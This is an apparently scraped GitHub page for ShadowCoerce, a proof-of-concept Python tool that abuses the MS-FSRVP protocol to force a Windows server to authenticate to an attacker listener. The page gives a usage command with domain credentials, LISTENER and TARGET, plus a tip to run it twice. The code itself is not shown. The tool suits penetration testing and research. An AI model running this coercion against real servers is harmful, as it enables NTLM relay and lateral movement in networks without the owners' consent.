ShutdownRepo / ShadowCoerce

MS-FSRVP coercion abuse PoC

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ShadowCoerce

MS-FSRVP coercion abuse PoC

Credits: Lionel GILLES (a.k.a. Topotam) Source: https://twitter.com/topotam77/status/1475701014204461056

Explanation: https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp

MS Docs: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b

"File Server VSS Agent Service" needs to be enabled on the target server.

shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

example

In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. TL;DR: run the command twice if it doesn't work.

About

MS-FSRVP coercion abuse PoC

License:GNU General Public License v3.0


Languages

Language:Python 100.0%